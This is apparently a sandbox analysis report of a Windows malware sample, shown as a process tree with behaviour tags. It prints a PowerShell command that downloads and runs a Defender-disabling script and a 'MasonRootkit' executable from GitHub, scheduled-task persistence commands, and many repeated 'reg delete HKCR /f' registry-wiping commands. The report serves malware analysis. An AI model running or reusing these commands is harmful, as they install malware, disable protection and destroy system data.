    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "$settings = '{\"WD\": false, \"adminrun\": false}' | ConvertFrom-Json; $randomString = \"2PewmOBXXq\"; if ($settings.WD) { $settings.adminrun = $true; (New-Object System.Net.WebClient).DownloadFile(\"https://raw.githubusercontent.com/ninhpn1337/Disable-Windows-Defender/main/source.bat\", $env:TEMP + '\' + $randomString + '.bat'); Start-Process -FilePath ($env:TEMP + '\' + $randomString + '.bat') -WindowStyle Hidden -Wait -Verb RunAs; }; if ($settings.adminrun) { $url = \"https://github.com/charlie-60/R/raw/refs/heads/main/MasonRootkit.exe\"; $outputPath = $env:TEMP + '\' + 'MasonRootkit.exe'; (New-Object System.Net.WebClient).DownloadFile($url, $outputPath); Start-Process $outputPath -Verb RunAs; } else { $url = \"https://github.com/charlie-60/R/raw/refs/heads/main/MasonRootkit.exe\"; $outputPath = $env:TEMP + '\' + 'MasonRootkit.exe'; (New-Object System.Net.WebClient).DownloadFile($url, $outputPath); Start-Process $outputPath; }"
    3⤵
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - Downloads MZ/PE file
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:2056
  - - C:\Users\Admin\AppData\Local\Temp\MasonRootkit.exe
      "C:\Users\Admin\AppData\Local\Temp\MasonRootkit.exe"
      4⤵
      Checks computer location settings
      Executes dropped EXE
      Suspicious use of WriteProcessMemory
      PID:4980
    - - C:\ProgramData\MasonRootkit.exe
        
        "C:\ProgramData\MasonRootkit.exe"
        5⤵
        Suspicious use of NtCreateUserProcessOtherParentProcess
        Executes dropped EXE
        Suspicious use of SetThreadContext
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:1040
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmpABD0.tmp.bat""
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:4824
      - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        6⤵
        
        PID:2364
      - C:\Windows\system32\timeout.exe
        
        timeout 3
        6⤵
        Delays execution with timeout.exe
        
        PID:4532
- - C:\Windows\System32\schtasks.exe
    "C:\Windows\System32\schtasks.exe" /create /f /sc minute /mo 1 /tn "MasonClient" /tr "C:\Users\Admin\AppData\Roaming\MasonClient.exe"
    3⤵
    - Scheduled Task/Job: Scheduled Task
    PID:2996
- - C:\Users\Admin\AppData\Local\Temp\AngryVirus.exe
    "C:\Users\Admin\AppData\Local\Temp\AngryVirus.exe"
    3⤵
    PID:2016
  - - C:\Windows\System32\schtasks.exe
      "C:\Windows\System32\schtasks.exe" /Create /F /TN "MasonMBR" /SC ONLOGON /TR "C:\Users\Admin\AppData\Local\Temp\\MasonMBR.exe" /RL HIGHEST
      4⤵
      Scheduled Task/Job: Scheduled Task
      PID:8452
- - C:\Users\Admin\AppData\Local\Temp\Pendulum.exe
    "C:\Users\Admin\AppData\Local\Temp\Pendulum.exe"
    3⤵
    PID:13644
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /c reg delete HKCR /f
    3⤵
    PID:13832
  - - C:\Windows\system32\reg.exe
      reg delete HKCR /f
      4⤵
      PID:4620
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /c reg delete HKCR /f
    3⤵
    PID:10488
  - - C:\Windows\system32\reg.exe
      reg delete HKCR /f
      4⤵
      PID:15076
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /c reg delete HKCR /f
    3⤵
    PID:13700
  - - C:\Windows\system32\reg.exe
      reg delete HKCR /f
      4⤵
      PID:10524
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /c reg delete HKCR /f
    3⤵
    PID:14016
  - - C:\Windows\system32\reg.exe
      reg delete HKCR /f
      4⤵
      PID:6948
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /c reg delete HKCR /f
    3⤵
    PID:4864
  - - C:\Windows\system32\reg.exe
      reg delete HKCR /f
      4⤵
      PID:3880
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /c reg delete HKCR /f
    3⤵
    PID:13792
  - - C:\Windows\system32\reg.exe
      reg delete HKCR /f
      4⤵
      PID:14972
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /c reg delete HKCR /f
    3⤵
    PID:2916
  - - C:\Windows\system32\reg.exe
      reg delete HKCR /f
      4⤵
      PID:11572
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /c reg delete HKCR /f
    3⤵
    PID:14772
  - - C:\Windows\system32\reg.exe
      reg delete HKCR /f
      4⤵
      PID:12264
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /c reg delete HKCR /f
    3⤵
    PID:10076
  - - C:\Windows\system32\reg.exe
      reg delete HKCR /f
      4⤵
      PID:11396
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /c reg delete HKCR /f
    3⤵
    PID:5124
  - - C:\Windows\system32\reg.exe
      reg delete HKCR /f
      4⤵
      PID:5280
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /c reg delete HKCR /f
    3⤵
    PID:4972
  - - C:\Windows\system32\reg.exe
      reg delete HKCR /f
      4⤵
      PID:11076
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /c reg delete HKCR /f
    3⤵
    PID:5412
  - - C:\Windows\system32\reg.exe
      reg delete HKCR /f
      4⤵
      PID:10020
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /c reg delete HKCR /f
    3⤵
    PID:4864
  - - C:\Windows\system32\reg.exe
      reg delete HKCR /f
      4⤵
      PID:13656
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /c reg delete HKCR /f
    3⤵
    PID:10516
  - - C:\Windows\system32\reg.exe
      reg delete HKCR /f
      4⤵
      PID:6760
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /c reg delete HKCR /f
    3⤵
    PID:12232
  - - C:\Windows\system32\reg.exe
      reg delete HKCR /f
      4⤵
      PID:15224
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /c reg delete HKCR /f
    3⤵
    PID:11940
  - - C:\Windows\system32\reg.exe
      reg delete HKCR /f
      4⤵
      PID:13588
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /c reg delete HKCR /f
    3⤵
    PID:9744
  - - C:\Windows\system32\reg.exe
      reg delete HKCR /f
      4⤵
      PID:13456
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /c reg delete HKCR /f
    3⤵
    PID:6868
  - - C:\Windows\system32\reg.exe
      reg delete HKCR /f
      4⤵
      PID:3228
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /c reg delete HKCR /f
    3⤵
    PID:5372
  - - C:\Windows\system32\reg.exe
      reg delete HKCR /f
      4⤵
      PID:3712
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /c reg delete HKCR /f
    3⤵
    PID:6220
  - - C:\Windows\system32\reg.exe
      reg delete HKCR /f
      4⤵
      PID:13884
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /c reg delete HKCR /f
    3⤵
    PID:6380
  - - C:\Windows\system32\reg.exe
      reg delete HKCR /f
      4⤵
      PID:13900
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /c reg delete HKCR /f
    3⤵
    PID:7548
  - - C:\Windows\system32\reg.exe
      reg delete HKCR /f
      4⤵
      PID:8804
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /c reg delete HKCR /f
    3⤵
    PID:7388
  - - C:\Windows\system32\reg.exe
      reg delete HKCR /f
      4⤵
      PID:6304
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /c reg delete HKCR /f
    3⤵
    PID:7140
  - - C:\Windows\system32\reg.exe
      reg delete HKCR /f
      4⤵
      PID:11380
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /c reg delete HKCR /f
    3⤵
    PID:1672
  - - C:\Windows\system32\reg.exe
      reg delete HKCR /f
      4⤵
      PID:10220
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /c reg delete HKCR /f
    3⤵
    PID:4088
  - - C:\Windows\system32\reg.exe
      reg delete HKCR /f
      4⤵
      PID:13124
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /c reg delete HKCR /f
    3⤵
    PID:11988
  - - C:\Windows\system32\reg.exe
      reg delete HKCR /f
      4⤵
      PID:14300
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /c reg delete HKCR /f
    3⤵
    PID:3400
  - - C:\Windows\system32\reg.exe
      reg delete HKCR /f
      4⤵
      PID:14204
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /c reg delete HKCR /f
    3⤵
    PID:11604
  - - C:\Windows\system32\reg.exe
      reg delete HKCR /f
      4⤵
      PID:3452
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /c reg delete HKCR /f
    3⤵
    PID:14188
  - - C:\Windows\system32\reg.exe
      reg delete HKCR /f
      4⤵
      PID:9864
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /c reg delete HKCR /f
    3⤵
    PID:5312
  - - C:\Windows\system32\reg.exe
      reg delete HKCR /f
      4⤵
      PID:3628
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /c reg delete HKCR /f
    3⤵
    PID:2164
  - - C:\Windows\system32\reg.exe
      reg delete HKCR /f
      4⤵
      PID:13216
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /c reg delete HKCR /f
    3⤵
    PID:10008
  - - C:\Windows\system32\reg.exe
      reg delete HKCR /f
      4⤵
      PID:5428
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /c reg delete HKCR /f
    3⤵
    PID:14828
  - - C:\Windows\system32\reg.exe
      reg delete HKCR /f
      4⤵
      PID:7140
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /c reg delete HKCR /f
    3⤵
    PID:14772
  - - C:\Windows\system32\reg.exe
      reg delete HKCR /f
      4⤵
      PID:11732
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /c reg delete HKCR /f
    3⤵
    PID:13452
  - - C:\Windows\system32\reg.exe
      reg delete HKCR /f
      4⤵
      PID:6348
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /c reg delete HKCR /f
    3⤵
    PID:15052
  - - C:\Windows\system32\reg.exe
      reg delete HKCR /f
      4⤵
      PID:9276
- - C:\Users\Admin\AppData\Local\Temp\MasonClient.exe
    "C:\Users\Admin\AppData\Local\Temp\MasonClient.exe"
    3⤵
    PID:11324
- - C:\Users\Admin\AppData\Local\Temp\MasonClient.exe
    "C:\Users\Admin\AppData\Local\Temp\MasonClient.exe"
    3⤵
    PID:1440
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /c reg delete HKCR /f
    3⤵
    PID:14004
  - - C:\Windows\system32\reg.exe
      reg delete HKCR /f
      4⤵
      PID:5548
- - C:\Users\Admin\AppData\Local\Temp\MasonClient.exe
    "C:\Users\Admin\AppData\Local\Temp\MasonClient.exe"
    3⤵
    PID:14476
- - C:\Users\Admin\AppData\Local\Temp\MasonClient.exe
    "C:\Users\Admin\AppData\Local\Temp\MasonClient.exe"
    3⤵
    PID:1136
- - C:\Users\Admin\AppData\Local\Temp\MasonClient.exe
    "C:\Users\Admin\AppData\Local\Temp\MasonClient.exe"
    3⤵
    PID:9696
- - C:\Users\Admin\AppData\Local\Temp\MasonClient.exe
    "C:\Users\Admin\AppData\Local\Temp\MasonClient.exe"
    3⤵
    PID:6684
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /c reg delete HKCR /f
    3⤵
    PID:15324
  - - C:\Windows\system32\reg.exe
      reg delete HKCR /f
      4⤵
      PID:1268
- - C:\Users\Admin\AppData\Local\Temp\MasonClient.exe
    "C:\Users\Admin\AppData\Local\Temp\MasonClient.exe"
    3⤵
    PID:6964
- - C:\Users\Admin\AppData\Local\Temp\MasonClient.exe
    "C:\Users\Admin\AppData\Local\Temp\MasonClient.exe"
    3⤵
    PID:10608
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /c reg delete HKCR /f
    3⤵
    PID:9808
  - - C:\Windows\system32\reg.exe
      reg delete HKCR /f
      4⤵
      PID:2300
- - C:\Users\Admin\AppData\Local\Temp\MasonClient.exe
    "C:\Users\Admin\AppData\Local\Temp\MasonClient.exe"
    3⤵
    PID:7712
- - C:\Users\Admin\AppData\Local\Temp\MasonClient.exe
    "C:\Users\Admin\AppData\Local\Temp\MasonClient.exe"
    3⤵
    PID:13176
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /c reg delete HKCR /f
    3⤵
    PID:5864
  - - C:\Windows\system32\reg.exe
      reg delete HKCR /f
      4⤵
      PID:11120
- - C:\Users\Admin\AppData\Local\Temp\MasonClient.exe
    "C:\Users\Admin\AppData\Local\Temp\MasonClient.exe"
    3⤵
    PID:8652
- - C:\Users\Admin\AppData\Local\Temp\MasonClient.exe
    "C:\Users\Admin\AppData\Local\Temp\MasonClient.exe"
    3⤵
    PID:6220
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /c reg delete HKCR /f
    3⤵
    PID:15132
  - - C:\Windows\system32\reg.exe
      reg delete HKCR /f
      4⤵
      PID:4824
- - C:\Users\Admin\AppData\Local\Temp\MasonClient.exe
    "C:\Users\Admin\AppData\Local\Temp\MasonClient.exe"
    3⤵
    PID:11076
- - C:\Users\Admin\AppData\Local\Temp\MasonClient.exe
    "C:\Users\Admin\AppData\Local\Temp\MasonClient.exe"
    3⤵
    PID:10164
- - C:\Users\Admin\AppData\Local\Temp\MasonClient.exe
    "C:\Users\Admin\AppData\Local\Temp\MasonClient.exe"
    3⤵
    PID:10740
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /c reg delete HKCR /f
    3⤵
    PID:6892
  - - C:\Windows\system32\reg.exe
      reg delete HKCR /f
      4⤵
      PID:6136
- - C:\Users\Admin\AppData\Local\Temp\MasonClient.exe
    "C:\Users\Admin\AppData\Local\Temp\MasonClient.exe"
    3⤵
    PID:9880
- - C:\Users\Admin\AppData\Local\Temp\MasonClient.exe
    "C:\Users\Admin\AppData\Local\Temp\MasonClient.exe"
    3⤵
    PID:6360
- - C:\Users\Admin\AppData\Local\Temp\MasonClient.exe
    "C:\Users\Admin\AppData\Local\Temp\MasonClient.exe"
    3⤵
    PID:7320
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /c reg delete HKCR /f
    3⤵
    PID:5348
  - - C:\Windows\system32\reg.exe
      reg delete HKCR /f
      4⤵
      PID:10508
- - C:\Users\Admin\AppData\Local\Temp\MasonClient.exe
    "C:\Users\Admin\AppData\Local\Temp\MasonClient.exe"
    3⤵
    PID:11384
- - C:\Users\Admin\AppData\Local\Temp\MasonClient.exe
    "C:\Users\Admin\AppData\Local\Temp\MasonClient.exe"
    3⤵
    PID:14384
- - C:\Users\Admin\AppData\Local\Temp\MasonClient.exe
    "C:\Users\Admin\AppData\Local\Temp\MasonClient.exe"
    3⤵
    PID:428
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /c reg delete HKCR /f
    3⤵
    PID:7528
  - - C:\Windows\system32\reg.exe
      reg delete HKCR /f
      4⤵
      PID:13284
- - C:\Users\Admin\AppData\Local\Temp\MasonClient.exe
    "C:\Users\Admin\AppData\Local\Temp\MasonClient.exe"
    3⤵
    PID:12684
- - C:\Users\Admin\AppData\Local\Temp\MasonClient.exe
    "C:\Users\Admin\AppData\Local\Temp\MasonClient.exe"
    3⤵
    PID:4228
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe"
    3⤵
    PID:10448
- - C:\Windows\System32\calc.exe
    "C:\Windows\System32\calc.exe"
    3⤵
    PID:12756
- - C:\Windows\System32\mspaint.exe
    "C:\Windows\System32\mspaint.exe"
    3⤵
    PID:9980
- - C:\Windows\System32\notepad.exe
    "C:\Windows\System32\notepad.exe"
    3⤵
    PID:11120
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /c reg delete HKCR /f
    3⤵
    PID:8372
  - - C:\Windows\system32\reg.exe
      reg delete HKCR /f
      4⤵
      PID:7372
- - C:\Users\Admin\AppData\Local\Temp\MasonClient.exe
    "C:\Users\Admin\AppData\Local\Temp\MasonClient.exe"
    3⤵
    PID:4724
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe"
    3⤵
    PID:2860
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe"
    3⤵
    PID:13028
- - C:\Users\Admin\AppData\Local\Temp\MasonClient.exe
    "C:\Users\Admin\AppData\Local\Temp\MasonClient.exe"
    3⤵
    PID:13788
- - C:\Users\Admin\AppData\Local\Temp\MasonClient.exe
    "C:\Users\Admin\AppData\Local\Temp\MasonClient.exe"
    3⤵
    PID:13952
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /c reg delete HKCR /f
    3⤵
    PID:10708
  - - C:\Windows\system32\reg.exe
      reg delete HKCR /f
      4⤵
      PID:10788
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe"
    3⤵
    PID:2492
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe"
    3⤵
    PID:5136
- - C:\Users\Admin\AppData\Local\Temp\MasonClient.exe
    "C:\Users\Admin\AppData\Local\Temp\MasonClient.exe"
    3⤵
    PID:10684
- - C:\Users\Admin\AppData\Local\Temp\MasonClient.exe
    "C:\Users\Admin\AppData\Local\Temp\MasonClient.exe"
    3⤵
    PID:7796
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe"
    3⤵
    PID:8712
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe"
    3⤵
    PID:3564
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe"
    3⤵
    PID:12084
- - C:\Users\Admin\AppData\Local\Temp\MasonClient.exe
    "C:\Users\Admin\AppData\Local\Temp\MasonClient.exe"
    3⤵
    PID:11508
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe"
    3⤵
    PID:7556
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe"
  2⤵
  - Enumerates system info in registry
  - Modifies data under HKEY_USERS
  - Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  PID:5404
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x17c,0x1a4,0x1a8,0x1a0,0x1ac,0x7fffa899cc40,0x7fffa899cc4c,0x7fffa899cc58
    3⤵
    PID:1016
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1696,i,9798049057202865540,6261402050331316175,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2044 /prefetch:2
    3⤵
    PID:1684
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=1888,i,9798049057202865540,6261402050331316175,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2112 /prefetch:3
    3⤵
    PID:5796
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=1860,i,9798049057202865540,6261402050331316175,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2216 /prefetch:8
    3⤵
    PID:5896
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3132,i,9798049057202865540,6261402050331316175,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3176 /prefetch:1
    3⤵
    PID:6048
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3140,i,9798049057202865540,6261402050331316175,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3392 /prefetch:1
    3⤵
    PID:5824
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4536,i,9798049057202865540,6261402050331316175,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4508 /prefetch:1
    3⤵
    PID:5112
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4704,i,9798049057202865540,6261402050331316175,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3888 /prefetch:8
    3⤵
    PID:1184
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4664,i,9798049057202865540,6261402050331316175,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4816 /prefetch:8
    3⤵
    PID:4724
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4696,i,9798049057202865540,6261402050331316175,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4688 /prefetch:8
    3⤵
    PID:5244
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4352,i,9798049057202865540,6261402050331316175,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4688 /prefetch:8
    3⤵
    PID:4168
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5068,i,9798049057202865540,6261402050331316175,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3888 /prefetch:8
    3⤵
    PID:2384
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4944,i,9798049057202865540,6261402050331316175,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4012 /prefetch:8
    3⤵
    PID:4732
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5064,i,9798049057202865540,6261402050331316175,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=5080 /prefetch:8
    3⤵
    PID:5352
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5040,i,9798049057202865540,6261402050331316175,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=5080 /prefetch:8
    3⤵
    PID:4236
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --extension-process --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --field-trial-handle=5056,i,9798049057202865540,6261402050331316175,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4996 /prefetch:2
    3⤵
    PID:560
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --no-appcompat-clear --gpu-preferences=WAAAAAAAAADoAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAACEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1156,i,9798049057202865540,6261402050331316175,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4936 /prefetch:8
    3⤵
    PID:4336

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
1⤵
PID:3360

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
1⤵
PID:3552

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:3720

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
- Suspicious use of UnmapMainImage
PID:3888

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
- Suspicious use of UnmapMainImage
PID:2928

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
1⤵
PID:4748

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV
1⤵
PID:3348

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
1⤵
- Modifies data under HKEY_USERS
PID:2920

C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
1⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:1944

C:\Windows\system32\SppExtComObj.exe
C:\Windows\system32\SppExtComObj.exe -Embedding
1⤵
PID:1896

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
1⤵
PID:4768

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
1⤵
- Modifies data under HKEY_USERS
PID:796

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:2084

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc
1⤵
PID:1504

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:3388

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
- Modifies registry class
- Suspicious use of UnmapMainImage
PID:3312

